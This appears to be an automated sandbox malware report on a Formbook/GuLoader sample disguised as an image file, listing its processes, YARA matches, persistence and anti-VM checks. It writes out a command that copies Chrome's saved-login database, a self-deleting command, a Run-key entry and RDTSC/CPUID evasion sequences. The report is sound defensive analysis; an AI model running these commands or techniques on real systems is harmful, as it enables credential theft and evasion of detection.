      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F2F1C0_2_029F2F1C
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F21070_2_029F2107
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F25010_2_029F2501
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3817461_2_1F381746
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3727821_2_1F372782
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2D57901_2_1F2D5790
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F381FCE1_2_1F381FCE
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E66111_2_1F2E6611
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E4E611_2_1F2E4E61
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F37CE661_2_1F37CE66
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E5E701_2_1F2E5E70
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2D76401_2_1F2D7640
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F373E961_2_1F373E96
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3826F81_2_1F3826F8
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F35C53F1_2_1F35C53F
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2D15301_2_1F2D1530
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3825191_2_1F382519
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F371D1B1_2_1F371D1B
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2B0D401_2_1F2B0D40
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F37E5811_2_1F37E581
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F35E58A1_2_1F35E58A
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F361DE31_2_1F361DE3
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F37D5D21_2_1F37D5D2
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F36FDDB1_2_1F36FDDB
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F36F42B1_2_1F36F42B
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2C740C1_2_1F2C740C
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2D14101_2_1F2D1410
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E547E1_2_1F2E547E
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F382C9A1_2_1F382C9A
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F381C9F1_2_1F381C9F
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3734901_2_1F373490
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3744EF1_2_1F3744EF
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F37DCC51_2_1F37DCC5
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2DFB401_2_1F2DFB40
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E4B961_2_1F2E4B96
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2BEBE01_2_1F2BEBE0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E63C21_2_1F2E63C2
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E523D1_2_1F2E523D
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F38E2141_2_1F38E214
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F370A021_2_1F370A02
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E4A5B1_2_1F2E4A5B
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2D42B01_2_1F2D42B0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F381A991_2_1F381A99
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3822DD1_2_1F3822DD
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E71101_2_1F2E7110
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E594B1_2_1F2E594B
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F38D9BE1_2_1F38D9BE
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E61801_2_1F2E6180
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3819E21_2_1F3819E2
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3761DF1_2_1F3761DF
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2EE0201_2_1F2EE020
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E00211_2_1F2E0021
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F37D0161_2_1F37D016
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E10701_2_1F2E1070
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3618B61_2_1F3618B6
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2CA0801_2_1F2CA080
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3828E81_2_1F3828E8
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E48CB1_2_1F2E48CB
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_005621071_2_00562107
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_005625011_2_00562501
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_00562F1C1_2_00562F1C
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: String function: 1F30DDE8 appears 36 times
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: String function: 1F2BB0E0 appears 168 times
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: vp2d3tbpivbxnjq8.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000000.00000002.836191179.000000000040E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamevlc.exe vs IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000000.00000002.839659007.00000000029D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.919434255.000000001F53F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000000.835287219.000000000040E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamevlc.exe vs IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.915366086.00000000000E9000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.918159349.000000001EE00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exeBinary or memory string: OriginalFilenamevlc.exe vs IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: 00000001.00000002.918234975.000000001F060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.918234975.000000001F060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.915230701.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.915230701.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/8@11/3
      Source: C:\Windows\SysWOW64\netsh.exeFile created: C:\Users\user\AppData\Roaming\083NCCSSJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2972:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_01
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeFile created: C:\Users\user\AppData\Local\Temp\~DF2C70F95705FF5AF2.TMPJump to behavior
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exeVirustotal: Detection: 44%
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exeMetadefender: Detection: 29%
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exeReversingLabs: Detection: 48%
      Source: unknownProcess created: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe 'C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe 'C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe 'C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe'
      Source: unknownProcess created: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe
      Source: unknownProcess created: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe 'C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe'
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeProcess created: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe 'C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe' Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe 'C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe' Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe 'C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe'Jump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6db7cd52-e3b7-4ecc-bb1f-388aeef6bb50}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeFile written: C:\Users\user\AppData\Roaming\083NCCSS\083logri.iniJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.888783969.0000000007010000.00000002.00000001.sdmp
      Source: Binary string: netsh.pdb source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.915324983.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: netsh.pdbGCTL source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.915324983.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.918924312.000000001F3AF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.888783969.0000000007010000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: vp2d3tbpivbxnjq8.exe PID: 4920, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: vp2d3tbpivbxnjq8.exe PID: 2408, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: IMAGE-M265NV_20200329_180550_0001 from google.exe PID: 3728, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: vp2d3tbpivbxnjq8.exe PID: 4668, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: IMAGE-M265NV_20200329_180550_0001 from google.exe PID: 5024, type: MEMORY
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00402019 push esp; mov dword ptr [esp], ecx0_2_0040201A
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00404681 push FFFFFFCDh; iretd 0_2_00404683
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F2F1C push esp; iretd 0_2_029F3137
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F2107 push esp; iretd 0_2_029F3137
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F2501 push esp; iretd 0_2_029F3137
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F3165 push esp; iretd 0_2_029F3137
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F30DE2D push ecx; ret 1_2_1F30DE40
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_00563165 push esp; iretd 1_2_00563137
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_00562107 push esp; iretd 1_2_00563137
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_00562501 push esp; iretd 1_2_00563137
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_00562F1C push esp; iretd 1_2_00563137
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeCode function: 14_2_02092501 push esp; iretd 14_2_02093137
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeCode function: 14_2_02092107 push esp; iretd 14_2_02093137
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeCode function: 14_2_02092F1C push esp; iretd 14_2_02093137
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeCode function: 14_2_02093165 push esp; iretd 14_2_02093137

      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\L5jwtnd\vp2d3tbpivbxnjq8.exeJump to dropped file

      Source: C:\Windows\SysWOW64\netsh.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run B8Q89L80V0HDJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run B8Q89L80V0HDJump to behavior

      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F24B3 0_2_029F24B3
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_005624B3 1_2_005624B3
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeCode function: 14_2_020924B3 14_2_020924B3
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeRDTSC instruction interceptor: First address: 00000000029F24B7 second address: 00000000029F24D7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c clc 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 cld 0x00000016 bt ecx, 1Fh 0x0000001a jc 00007F7540659072h 0x0000001c popad 0x0000001d lfence 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeRDTSC instruction interceptor: First address: 00000000029F24D7 second address: 00000000029F24B7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F754070A45Dh 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 cmp ecx, 00000000h 0x00000019 jne 00007F754070A483h 0x0000001b push ecx 0x0000001c call 00007F754070A4AFh 0x00000021 lfence 0x00000024 clc 0x00000025 rdtsc
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeRDTSC instruction interceptor: First address: 00000000005624B7 second address: 00000000005624D7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a mov esi, edx 0x0000000c clc 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 cld 0x00000016 bt ecx, 1Fh 0x0000001a jc 00007F7540659072h 0x0000001c popad 0x0000001d lfence 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeRDTSC instruction interceptor: First address: 00000000005624D7 second address: 00000000005624B7 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F754070A45Dh 0x00000011 lfence 0x00000014 clc 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeRDTSC instruction interceptor: First address: 00000000004098B4 second address: 00000000004098BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeRDTSC instruction interceptor: First address: 0000000000409B1E second address: 0000000000409B24 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 0000000002D998B4 second address: 0000000002D998BA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
